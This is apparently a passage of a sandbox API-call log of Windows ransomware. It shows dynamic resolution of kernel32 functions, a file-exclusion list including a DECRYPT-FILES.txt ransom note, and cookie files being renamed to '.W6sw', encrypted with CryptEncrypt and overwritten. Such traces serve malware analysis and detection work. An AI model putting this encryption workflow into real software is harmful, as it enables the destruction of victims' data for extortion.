(in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.162] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.163] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.163] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.163] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.163] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.163] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.163] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.163] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.163] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.163] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.163] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.163] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.163] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.163] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.163] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.163] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.163] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.163] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.163] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.163] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.164] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.164] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.164] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.164] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.164] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.164] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.164] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.164] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.164] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.164] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.164] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.164] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.164] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.164] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.164] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.164] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.164] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.164] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.164] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.164] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.165] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.165] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.165] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.165] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.165] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.165] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.165] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.165] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.165] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.165] lstrlenA (lpString="DELETEATOM") returned 10 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.165] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.165] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.165] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.165] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.165] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.165] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.165] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.165] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.165] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.166] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.166] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.166] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.166] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.166] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.166] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.166] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.166] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.166] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.166] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.166] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.166] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.166] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.166] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.166] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.166] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.166] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.166] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.166] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.167] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.167] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.167] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.167] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.167] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.167] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.167] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.167] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.167] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.167] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.167] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.167] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.167] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.167] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.167] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.167] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.168] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt") returned 110 [0079.168] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw") returned 115 [0079.168] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.w6sw"), dwFlags=0x0) returned 1 [0079.168] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.168] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.169] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.169] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53c70990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53c70990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x53c70990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x52, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adtr02[1].txt", cAlternateFileName="5P5NRG~3.TXT")) returned 1 [0079.169] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.169] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="autorun.inf") returned -1 [0079.169] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="boot.ini") returned -1 [0079.169] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="desktop.ini") returned -1 [0079.169] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="ntuser.dat") returned -1 [0079.169] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="iconcache.db") returned -1 [0079.169] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="bootsect.bak") returned -1 [0079.169] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.169] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="thumbs.db") returned -1 [0079.169] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpString2="Bootfont.bin") returned -1 [0079.169] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adtr02[1].txt") returned 34 [0079.169] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.169] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.169] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.169] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.169] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.169] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adtr02[1].txt") returned 34 [0079.169] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.169] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adtr02[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" [0079.169] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.170] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.170] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=82) returned 1 [0079.170] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.170] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.170] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.170] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.170] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.172] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.172] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.172] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.173] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.173] CloseHandle (hObject=0x464) returned 1 [0079.173] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.173] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.174] CloseHandle (hObject=0x0) returned 0 [0079.174] CloseHandle (hObject=0x460) returned 1 [0079.174] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.175] VirtualFree 